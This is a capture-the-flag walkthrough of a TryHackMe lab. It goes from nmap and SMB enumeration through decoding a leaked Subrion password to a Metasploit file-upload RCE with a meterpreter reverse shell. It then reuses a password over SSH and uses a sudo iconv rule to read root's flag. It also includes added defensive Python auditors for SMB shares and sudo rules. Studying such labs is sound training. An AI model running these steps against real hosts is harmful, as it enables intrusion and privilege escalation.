[THM] Tech_Supp0rt: 1

Word count: 1.8k


Information gathering

First, check which ports are open. Three services are exposed: HTTP, SSH and SMB.

nmap -sV -sC -v 10.48.163.129
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-09 06:09 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Initiating Ping Scan at 06:09
Scanning 10.48.163.129 [4 ports]
Completed Ping Scan at 06:09, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:09
Completed Parallel DNS resolution of 1 host. at 06:09, 0.02s elapsed
Initiating SYN Stealth Scan at 06:09
Scanning 10.48.163.129 [1000 ports]
Discovered open port 22/tcp on 10.48.163.129
Discovered open port 80/tcp on 10.48.163.129
Discovered open port 139/tcp on 10.48.163.129
Discovered open port 445/tcp on 10.48.163.129
Completed SYN Stealth Scan at 06:09, 16.08s elapsed (1000 total ports)
Initiating Service scan at 06:09
Scanning 4 services on 10.48.163.129
Completed Service scan at 06:09, 11.70s elapsed (4 services on 1 host)
NSE: Script scanning 10.48.163.129.
Initiating NSE at 06:09
Completed NSE at 06:10, 8.78s elapsed
Initiating NSE at 06:10
Completed NSE at 06:10, 0.79s elapsed
Initiating NSE at 06:10
Completed NSE at 06:10, 0.00s elapsed
Nmap scan report for 10.48.163.129
Host is up (0.19s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2026-02-09T16:39:55+05:30
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-02-09T11:09:56
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

NSE: Script Post-scanning.
Initiating NSE at 06:10
Completed NSE at 06:10, 0.00s elapsed
Initiating NSE at 06:10
Completed NSE at 06:10, 0.00s elapsed
Initiating NSE at 06:10
Completed NSE at 06:10, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.88 seconds
Raw packets sent: 1318 (57.968KB) | Rcvd: 1087 (45.000KB)


Visiting the HTTP service just shows the default Apache2 page with nothing on it, so run dirsearch first to see whether there are any further directories.

The test directory is a page full of ads; it looks like the site has been compromised.

There is also a WordPress blog.

So naturally run wpscan against it. User enumeration found one user, support.

wpscan --url http://blog.thm --enumerate u

Next, check whether the SMB service leaks anything, such as passwords.

Scanning the SMB service with nmap shows that the websvr share is accessible.

 kali@kali  ~  sudo nmap -p 445,139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.48.163.129 
[sudo] kali 的密码:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-09 06:11 EST
Nmap scan report for 10.48.163.129
Host is up (0.19s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.48.163.129\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (TechSupport server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.48.163.129\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
| Current user access: <none>
| \\10.48.163.129\websvr:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\scamsite\websvr
| Anonymous access: READ/WRITE
|_ Current user access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 33.38 seconds
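The share listing above is the finding a defender would want to catch before an attacker does. As an added example (not code from the original writeup), the Python audit below parses the smb-enum-shares section, copied from the page's output and embedded as a constructed sample, and flags every non-IPC share that an anonymous session can read or write, escalating the severity when a writable share is backed by a user's home directory (as websvr is here).

```python
import re

# Constructed sample: the share section of the page's smb-enum-shares output (fields trimmed).
NMAP_SHARES = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.48.163.129\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (TechSupport server (Samba, Ubuntu))
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|   \\10.48.163.129\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|   \\10.48.163.129\websvr:
|     Type: STYPE_DISKTREE
|     Comment:
|     Path: C:\home\scamsite\websvr
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
"""

SHARE_RE = re.compile(r"^\|[_ ]\s*\\\\[^\\]+\\(\S+):$")           # |   \\host\name:
FIELD_RE = re.compile(r"^\|[_ ]\s*([A-Za-z][A-Za-z ]*): ?(.*)$")  # |     Field: value

def parse_shares(text):
    """Return {share_name: {field: value}} from the smb-enum-shares NSE output."""
    shares, current = {}, None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = m.group(1)
            shares[current] = {}
        elif current is not None and (m := FIELD_RE.match(line)):
            shares[current][m.group(1).strip()] = m.group(2).strip()
    return shares

def risky_shares(shares):
    """Flag non-IPC shares that an anonymous (guest) session can read or write."""
    findings = []
    for name, info in shares.items():
        anon, path = info.get("Anonymous access", "<none>"), info.get("Path", "")
        if info.get("Type") == "STYPE_IPC_HIDDEN" or anon == "<none>":
            continue
        severity = "HIGH" if "WRITE" in anon else "MEDIUM"
        if "WRITE" in anon and "\\home\\" in path:
            severity = "CRITICAL"   # anonymous writes land inside a user's home directory
        findings.append((name, anon, path, severity))
    return findings
```

Running risky_shares(parse_shares(NMAP_SHARES)) returns only websvr, rated CRITICAL because it is world-writable and lives under /home/scamsite; the fix is guest ok = no (or map to guest = Never) and read only = yes in smb.conf for that share.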

Connect with smbclient; the share holds an enter.txt file. Download it and look at its contents.

smbclient //10.48.163.129/websvr
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 03:17:38 2021
.. D 0 Sat May 29 03:03:47 2021
enter.txt N 273 Sat May 29 03:17:38 2021

8460484 blocks of size 1024. 5671140 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>

The file reveals an admin credential (a hash, maybe?) and also mentions a /subrion site. Visiting it directly seems to show nothing, but the note says to edit it from the panel; appending that gives /subrion/panel, which turns out to be a login page.

cat enter.txt 
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

I put the admin "hash" into an MD5 lookup site and found nothing, so it presumably isn't a hash. I tried CyberChef next, in Magic mode, and it turned out to be several layers of base encoding; decoding them gives the password.

With it I logged into the Subrion back end successfully (I also ran hydra against the WordPress support account, but it didn't crack, so the exploitation path mainly goes through the Subrion CMS).
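The "magical formula" is just stacked encodings, which is why a note like enter.txt on a guest-writable share is a credential leak, not a protected secret. As an added example (not part of the original writeup), the Python below does what CyberChef's Magic mode did here: it peels base encodings one layer at a time, accepting a layer only when the result is printable ASCII. The base58 alphabet assumed is the Bitcoin one CyberChef uses by default; the credential string from enter.txt is kept as a constant so you can call peel() on it.

```python
import base64

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def b58decode(s):
    """Bitcoin-alphabet base58 decode; leading '1' characters map to leading zero bytes."""
    if not s or any(c not in B58 for c in s):
        raise ValueError("not base58")
    n = 0
    for c in s:
        n = n * 58 + B58.index(c)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return b"\x00" * (len(s) - len(s.lstrip("1"))) + body

def b58encode(b):
    n, out = int.from_bytes(b, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    return "1" * (len(b) - len(b.lstrip(b"\x00"))) + out

# Strict decoders: each raises ValueError (binascii.Error subclasses it) on foreign characters.
DECODERS = {
    "base32": base64.b32decode,  # upper-case A-Z, 2-7 and '=' only (no casefold)
    "base58": b58decode,
    "base64": lambda s: base64.b64decode(s, validate=True),
}
ENCODERS = {  # used to build known layered inputs for testing the peeler
    "base32": lambda s: base64.b32encode(s.encode()).decode(),
    "base58": lambda s: b58encode(s.encode()),
    "base64": lambda s: base64.b64encode(s.encode()).decode(),
}

def peel(text, max_layers=8):
    """Strip encoding layers until no decoder yields printable ASCII; return (plaintext, layers)."""
    layers = []
    for _ in range(max_layers):
        for name, dec in DECODERS.items():
            try:
                out = dec(text).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if out and out.isprintable():
                text, layers = out, layers + [name]
                break
        else:
            break
    return text, layers

PAGE_CREDENTIAL = "7sKvntXdPEJaxazce9PXi24zaFrLiKWCk"  # the cooked value from enter.txt; try peel(PAGE_CREDENTIAL)
```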

Exploitation

The Subrion CMS back end shows version 4.2.1. Searching vulnerability databases turns up a file upload vulnerability that looks usable.


I also checked msfconsole for an exploit module, and there is indeed one, with a matching version.

Filling in the corresponding parameters gives a shell.

msf exploit(multi/http/subrion_cms_file_upload_rce) > show options 

Module options (exploit/multi/http/subrion_cms_file_upload_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD Scam2021 yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
RHOSTS 10.48.163.129 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes Subrion CMS default port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /subrion yes Base path
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 PHP



View the full module info with the info, or info -d command.


Privilege escalation

After getting the shell, we are running as www-data.

Upload LinEnum.sh to look for privilege escalation vectors.

It finds a local listener on port 3306, so the MySQL service might be usable, and it finds a user account, scamsite; nothing else stands out.

The local MySQL service needs a password, though; the site configuration files might contain one.

Checking wp-config.php in the WordPress directory gives a username and password.

However, the meterpreter shell is not interactive, so I couldn't tell whether mysql actually connected, and couldn't view the database.

Later I tried the same password for an SSH login as scamsite, and it worked.

Then sudo -l shows the account's privileges: iconv can be run as root without a password.

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv

Check GTFOBins for known techniques; it can be used to read files.

Finally, running sudo iconv -f 8859_1 -t 8859_1 /root/root.txt gets the flag.
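The sudo -l entry above is the kind of misconfiguration a host audit should catch: a NOPASSWD rule for a binary that GTFOBins lists as a file read/write primitive is as good as root. As an added example (not from the original writeup), the Python below parses the page's sudo -l output, embedded as a constructed sample together with one benign /usr/bin/uptime entry for contrast, and flags entries that are unrestricted or name a GTFOBins binary; the GTFOBINS table is a small hand-picked subset of that project's sudo entries, not a complete list.

```python
import re

# Constructed sample: the page's sudo -l output for scamsite, plus one benign entry for contrast.
SUDO_L = r"""
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
    (root) /usr/bin/uptime
"""

# Subset of GTFOBins "sudo" entries: what the binary hands out when it runs as root.
GTFOBINS = {
    "iconv": "file read / file write",
    "cat": "file read", "tee": "file write", "cp": "file write",
    "vim": "shell", "less": "shell", "find": "shell", "awk": "shell",
    "python": "shell", "tar": "shell", "env": "shell", "bash": "shell",
}

ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_l(text):
    """Return (runas, [tags], command) for each entry under 'may run the following commands'."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = ENTRY_RE.match(line) if in_cmds else None
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]   # e.g. NOPASSWD, SETENV
            entries.append((m.group("runas"), tags, m.group("cmd").strip()))
    return entries

def audit(entries):
    """Flag entries whose command is unrestricted or a known GTFOBins primitive."""
    findings = []
    for runas, tags, cmd in entries:
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        reasons = []
        if cmd == "ALL":
            reasons.append("any command allowed")
        elif binary in GTFOBINS:
            reasons.append(f"{binary} gives {GTFOBINS[binary]} (runas {runas})")
        if reasons and "NOPASSWD" in tags:
            reasons.append("no password required")
        if reasons:
            findings.append((cmd, reasons))
    return findings
```

On the sample, audit(parse_sudo_l(SUDO_L)) reports only the iconv rule; the uptime entry passes, and the remediation is to drop the rule (or restrict it to fixed arguments and remove NOPASSWD).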

Summary

As for getting a root shell afterwards, the other writeups I've seen mostly use iconv to write an SSH public key and then log in as root.